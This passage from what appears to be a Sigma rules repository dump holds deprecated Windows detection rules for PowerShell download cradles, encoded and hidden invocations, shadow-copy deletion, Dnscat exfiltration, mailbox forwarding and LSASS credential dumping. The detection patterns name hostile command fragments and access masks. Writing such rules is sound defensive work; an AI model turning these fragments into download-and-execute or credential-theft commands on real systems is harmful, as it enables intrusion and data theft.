    "content": "title: Execution via CL_Mutexverifiers.ps1\nid: 39776c99-1c7b-4ba0-b5aa-641525eee1a4\nstatus: deprecated\ndescription: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\n    - https://twitter.com/pabraeken/status/995111125447577600\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CL_Mutexverifiers.ps1'\n            - 'runAfterCancelProcess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_dnscat_execution.yml",
    "content": "title: Dnscat Execution\nid: a6d67db4-6220-436d-8afc-f3842fe05d43\nstatus: deprecated # In favour of the more generic Susp and Malicious Cmdlet rules\ndescription: Dnscat exfiltration tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2024/01/25\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Start-Dnscat2'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml",
    "content": "title: Suspicious PowerShell Mailbox SMTP Forward Rule\nid: 15b7abbb-8b40-4d01-9ee2-b51994b1d474\nstatus: deprecated\ndescription: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.\nreferences:\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\nmodified: 2026-03-01\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Mailbox '\n            - ' -DeliverToMailboxAndForward '\n            - ' -ForwardingSmtpAddress '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the cmdlet to forward emails\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_ps_file_and_directory_discovery.yml",
    "content": "title: Powershell File and Directory Discovery\nid: d23f2ba5-9da0-4463-8908-8ee47f614bb9\nstatus: deprecated\ndescription: |\n    Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\n    Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\n    including whether or not the adversary fully infects the target and/or attempts specific actions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: frack113\ndate: 2021/12/15\nmodified: 2023/12/11\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - ls\n            - get-childitem\n            - gci\n    recurse:\n        ScriptBlockText|contains: '-recurse'\n    condition: selection and recurse\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/posh_ps_invoke_nightmare.yml",
    "content": "title: PrintNightmare Powershell Exploitation\nid: 6d3f1399-a81c-4409-aff3-1ecfe9330baf\nstatus: deprecated\ndescription: Detects Commandlet name for PrintNightmare exploitation.\nreferences:\n    - https://github.com/calebstewart/CVE-2021-1675\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021/08/09\nmodified: 2023/01/02\ntags:\n    - attack.privilege_escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Invoke-Nightmare'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_susp_gwmi.yml",
    "content": "title: Suspicious Get-WmiObject\nid: 0332a266-b584-47b4-933d-a00b103e1b37\nstatus: deprecated\ndescription: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers\nreferences:\n    - https://attack.mitre.org/datasources/DS0005/\n    - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022/01/12\nmodified: 2023/12/11\ntags:\n    - attack.persistence\n    - attack.t1546\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n    filter_cl_utility:\n        Path|endswith: '\\CL_Utility.ps1'\n        ScriptBlockText|contains|all:\n            - 'function Get-FreeSpace'\n            - 'SELECT * FROM Win32_LogicalDisk WHERE MediaType=12'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/powershell_ps_susp_win32_shadowcopy.yml",
    "content": "title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script\nid: e17121b4-ef2a-4418-8a59-12fb1631fa9e\nrelated:\n    - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\n      type: similar\n    - id: c1337eb8-921a-4b59-855b-4ba188ddcc42\n      type: similar\nstatus: deprecated\ndescription: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\nauthor: frack113\ndate: 2021-12-26\nmodified: 2025-05-20\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-WmiObject'\n            - 'Win32_ShadowCopy'\n            - '.Delete()'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_download.yml",
    "content": "title: Suspicious PowerShell Download\nid: 65531a81-a694-4e31-ae04-f8ba5bc33759\nstatus: deprecated\ndescription: Detects suspicious PowerShell download command\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/05\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    webclient:\n        - 'System.Net.WebClient'\n    download:\n        - '.DownloadFile('\n        - '.DownloadString('\n    condition: webclient and download\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic\nid: 3d304fda-78aa-43ed-975c-d740798a49c1\nstatus: deprecated\ndescription: Detects suspicious PowerShell invocation command parameters\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/12\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection_encoded:\n        - ' -enc '\n        - ' -EncodedCommand '\n    selection_hidden:\n        - ' -w hidden '\n        - ' -window hidden '\n        - ' -windowstyle hidden '\n    selection_noninteractive:\n        - ' -noni '\n        - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific\nid: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\nstatus: deprecated\ndescription: Detects suspicious PowerShell invocation command parameters\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017/03/05\nmodified: 2023/05/04\nlogsource:\n    product: windows\n    service: powershell\n    definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103\ndetection:\n    selection_convert_b64:\n        '|all':\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        '|all':\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        '|all':\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        '|all':\n            - 'powershell'\n            - 'reg'\n            - 'add'\n            - 'HKCU\\software\\microsoft\\windows\\currentversion\\run'\n    selection_webclient:\n         '|all':\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        '|all':\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n        - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n        - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020/10/05\nmodified: 2022/04/11\ntags:\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection:\n        - 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\nstatus: deprecated"
  },
  {
    "path": "deprecated/windows/proc_access_win_in_memory_assembly_execution.yml",
    "content": "title: Suspicious In-Memory Module Execution\nid: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39\nstatus: deprecated\ndescription: |\n    Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space.\n    An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way),\n    it will display \"UNKNOWN\" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory.\n    Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that\n    most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries.\n    The latter should also be considered suspicious.\nreferences:\n    - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/\nauthor: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro\ndate: 2019/10/27\nmodified: 2022/11/17\ntags:\n    - attack.privilege_escalation\n    - attack.defense_evasion\n    - attack.t1055.001\n    - attack.t1055.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection1:\n        CallTrace|contains|all:\n            - 'C:\\WINDOWS\\SYSTEM32\\ntdll.dll+'\n            - '|C:\\WINDOWS\\System32\\KERNELBASE.dll+'\n            - '|UNKNOWN('\n            - ')'\n    selection2:\n        CallTrace|contains|all:\n            - 'UNKNOWN('\n            - ')|UNKNOWN('\n        CallTrace|endswith: ')'\n    selection3:\n        CallTrace|contains: 'UNKNOWN'\n        GrantedAccess:\n            - '0x1F0FFF'\n            - '0x1F1FFF'\n            - '0x143A'\n            - '0x1410'\n            - '0x1010'\n            - '0x1F2FFF'\n            - '0x1F3FFF'\n            - '0x1FFFFF'\n    filter:\n        - SourceImage|endswith:\n            - '\\Windows\\System32\\sdiagnhost.exe'\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n            - '\\git\\usr\\bin\\sh.exe'\n            - '\\IDE\\devenv.exe'\n            - '\\GitHubDesktop\\Update.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\backgroundTaskHost.exe'\n            - '\\GitHubDesktop.exe'\n        - SourceImage|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\\\*\\NGenTask.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework'\n            - 'C:\\WINDOWS\\System32\\DriverStore\\'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\'\n        - SourceImage:\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - 'C:\\WINDOWS\\system32\\ctfmon.exe'\n            - 'C:\\WINDOWS\\system32\\NhNotifSys.exe'\n            - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n            - 'C:\\Windows\\explorer.exe'\n        - TargetImage: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        - TargetImage|endswith: '\\Microsoft VS Code\\Code.exe'\n        - CallTrace|contains: '|C:\\WINDOWS\\System32\\RPCRT4.dll+'  # attempt to save the rule with a broader filter\n    filter_set_1:\n        SourceImage: 'C:\\WINDOWS\\Explorer.EXE'\n        TargetImage:\n            - 'C:\\WINDOWS\\system32\\backgroundTaskHost.exe'\n            - 'C:\\WINDOWS\\explorer.exe'\n    filter_msmpeng:\n        SourceImage|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_eclipse:\n        SourceImage|endswith: '\\eclipse.exe'\n        CallTrace|contains:\n            - '\\jre\\bin\\java.dll'\n            - '|C:\\Windows\\SYSTEM32\\windows.storage.dll+'\n            - '\\configuration\\org.eclipse.osgi\\'\n    filter_openwith:\n        SourceImage: 'C:\\Windows\\system32\\OpenWith.exe'\n        TargetImage: 'C:\\Windows\\Explorer.EXE'\n    filter_teams:\n        SourceImage|startswith: 'C:\\Users\\'\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        TargetImage|endswith:\n            - ':\\Windows\\Explorer.EXE'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n            - '\\MsMpEng.exe'\n    filter_wwahost:\n        SourceImage: 'C:\\Windows\\System32\\WWAHost.exe'\n        TargetImage: 'C:\\Windows\\System32\\svchost.exe'\n    filter_sppsvc:\n        SourceImage: C:\\WINDOWS\\system32\\sppsvc.exe\n        TargetImage: C:\\WINDOWS\\system32\\SppExtComObj.exe\n    condition: 1 of selection* and not 1 of filter*\nfields:\n    - ComputerName\n    - User\n    - SourceImage\n    - TargetImage\n    - CallTrace\nfalsepositives:\n    - SysInternals Process Explorer\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_lazagne_cred_dump_lsass_access.yml",
    "content": "title: Credential Dumping by LaZagne\nid: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0\nstatus: stable\ndescription: Detects LSASS process access by LaZagne for credential dumping.\nreferences:\n    - https://twitter.com/bh4b3sh/status/1303674603819081728\nauthor: Bhabesh Raj, Jonhnathan Ribeiro\ndate: 2020/09/09\nmodified: 2022/08/13\ntags:\n    - attack.credential_access\n    - attack.t1003.001\n    - attack.s0349\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n            - '|C:\\Windows\\System32\\KERNELBASE.dll+'\n            - '_ctypes.pyd+'\n            - 'python27.dll+'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_lsass_susp_access.yml",
    "content": "title: Credential Dumping Tools Accessing LSASS Memory\nid: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\nstatus: deprecated\ndescription: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools\nreferences:\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community\ndate: 2017/02/16\nmodified: 2023/11/30\ntags:\n    - attack.credential_access\n    - attack.t1003.001\n    - attack.s0002\n    - car.2019-04-004\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|startswith:\n            - '0x40'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n            # - '0x1400'\n            - '0x100000'\n            - '0x1410'    # car.2019-04-004\n            # - '0x1010'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n    filter_exact:\n        SourceImage:\n            - 'C:\\WINDOWS\\system32\\taskmgr.exe'\n            - 'C:\\Windows\\System32\\perfmon.exe'\n    filter_generic:\n        SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n    filter_defender:\n        SourceImage|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe' # Windows7\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_defender_updates:\n        SourceImage: 'C:\\Windows\\System32\\svchost.exe'\n        CallTrace|contains|all:\n            - '|C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{'\n            - '}\\mpengine.dll+'\n        GrantedAccess: '0x1418'\n    filter_defender_calltrace:\n        CallTrace|contains:\n            - '|c:\\program files\\windows defender\\mprtp.dll'\n            - '|c:\\program files\\windows defender\\MpClient.dll'\n    filter_gaming_services:\n        SourceImage|startswith: 'C:\\Program Files\\WindowsApps\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n    filter_specific_granted_access_1:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - '\\MBAMInstallerService.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n            - '0x40'\n    filter_specific_granted_access_2:\n        SourceImage:\n            - 'C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe'\n            - 'C:\\Windows\\syswow64\\MsiExec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n            - '0x1f1fff'\n            - '0x1f3fff'\n    filter_specific_granted_access_3:\n        SourceImage:\n            - 'C:\\Windows\\system32\\wininit.exe'\n            - 'C:\\Windows\\System32\\lsass.exe'\n        GrantedAccess: '0x1000000'\n    filter_vmwaretools:\n        SourceImage|startswith: 'C:\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    filter_svchost:\n        SourceImage: 'C:\\WINDOWS\\system32\\svchost.exe'\n        GrantedAccess:\n            - '0x100000'\n            - '0x1410'\n    filter_nextron:\n        SourceImage|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n            - '\\aurora-agent.exe'\n            - '\\aurora-agent-64.exe'\n        GrantedAccess:\n            - '0x40'\n            - '0x1010'\n    filter_explorer:\n        SourceImage|endswith: '\\explorer.exe'\n        GrantedAccess: '0x401'\n    filter_mrt:\n        SourceImage: 'C:\\Windows\\system32\\MRT.exe' # Windows Malicious Software Removal Tool\n        GrantedAccess:\n            - '0x1410'\n            - '0x1418'\n    filter_handle:\n        GrantedAccess: '0x40'\n        SourceImage|endswith:\n            - '\\handle.exe'\n            - '\\handle64.exe'\n    filter_edge: # version in path 96.0.1054.43\n        SourceImage|startswith: 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n        SourceImage|endswith: '\\Installer\\setup.exe'\n    filter_webex:\n        SourceImage|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        GrantedAccess: '0x401'\n    filter_malwarebytes:\n        SourceImage: 'C:\\PROGRAMDATA\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n        GrantedAccess: '0x1410'\n    filter_dropbox:\n        SourceImage|contains:\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_msbuild:\n        # This FP was generated while building CPython from source and could be related to other similar examples.\n        # But if you don't do that kind of stuff consider removing it from the rule ;)\n        SourceImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n        SourceImage|endswith: '\\MSBuild\\Current\\Bin\\MSBuild.exe'\n        GrantedAccess: '0x1F3FFF'\n    # Old - too broad filter\n        # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts\n        #     - '\\wmiprvse.exe'\n        #     - '\\taskmgr.exe'\n        #     - '\\procexp64.exe'\n        #     - '\\procexp.exe'\n        #     - '\\lsm.exe'\n        #     - '\\MsMpEng.exe'\n        #     - '\\csrss.exe'\n        #     - '\\wininit.exe'\n        #     - '\\vmtoolsd.exe'\n    filter_games:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n    condition: selection and not 1 of filter_*\nfields:\n    - ComputerName\n    - User\n    - SourceImage\nfalsepositives:\n    - Likely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_pypykatz_cred_dump_lsass_access.yml",
    "content": "title: Credential Dumping by Pypykatz\nid: 7186e989-4ed7-4f4e-a656-4674b9e3e48b\nstatus: test\ndescription: Detects LSASS process access by pypykatz for credential dumping.\nreferences:\n    - https://github.com/skelsec/pypykatz\nauthor: Bhabesh Raj\ndate: 2021/08/03\nmodified: 2022/10/09\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n            - 'C:\\Windows\\System32\\KERNELBASE.dll+'\n            - 'libffi-7.dll'\n            - '_ctypes.pyd+'\n            - 'python3*.dll+'   # Pypy requires python>=3.6\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_susp_invoke_patchingapi.yml",
    "content": "title: Potential NT API Stub Patching\nid: b916cba1-b38a-42da-9223-17114d846fd6\nstatus: deprecated\ndescription: Detects potential NT API stub patching as seen used by the project PatchingAPI\nreferences:\n    - https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch\n    - https://twitter.com/D1rkMtr/status/1611471891193298944?s=20\nauthor: frack113\ndate: 2023/01/07\nmodified: 2024/05/27\ntags:\n    - attack.defense_evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        GrantedAccess: '0x1FFFFF'\n        CallTrace|startswith: 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n        CallTrace|contains: '|UNKNOWN('\n        CallTrace|endswith: ')'\n    filter_main_generic:\n        # To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights\n        - SourceImage|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n        - TargetImage|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n    filter_optional_thor:\n        SourceImage|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_githubdesktop:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\app-'\n        SourceImage|endswith:\n            - '\\GitHubDesktop.exe'\n            - '\\resources\\app\\git\\usr\\bin\\sh.exe'\n        TargetImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\app-'\n    filter_main_dotnet:\n        SourceImage|contains: ':\\Windows\\Microsoft.NET\\'\n        TargetImage|contains: ':\\Windows\\Microsoft.NET\\'\n    filter_main_taskhost:\n        SourceImage|contains:\n            - ':\\Windows\\system32\\taskhostw.exe'\n            - ':\\Windows\\system32\\taskhost.exe'\n        TargetImage|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\v'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\v'\n        TargetImage|endswith: '\\NGenTask.exe'\n    filter_optional_teams_to_update:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n    filter_optional_teams_update_regsvr32:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetImage|endswith: ':\\WINDOWS\\SysWOW64\\regsvr32.exe'\n    filter_optional_teams_update_to_teams:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_apt29_thinktanks.yml",
    "content": "title: APT29\nid: 033fe7d6-66d1-4240-ac6b-28908009c71f\nstatus: deprecated\ndescription: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.\nreferences:\n    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/\n    - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/12/04\nmodified: 2023/03/08\ntags:\n    - attack.execution\n    - attack.g0016\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-noni'\n            - '-ep'\n            - 'bypass'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_dragonfly.yml",
    "content": "title: CrackMapExecWin\nid: 04d9079e-3905-4b70-ad37-6bdf11304965\nstatus: deprecated\ndescription: Detects CrackMapExecWin Activity as Described by NCSC\nreferences:\n    - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control\n    - https://attack.mitre.org/software/S0488/\nauthor: Markus Neis\ndate: 2018/04/08\nmodified: 2023/03/08\ntags:\n    - attack.g0035\n    - attack.credential_access\n    - attack.discovery\n    - attack.t1110\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\crackmapexec.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_gallium.yml",
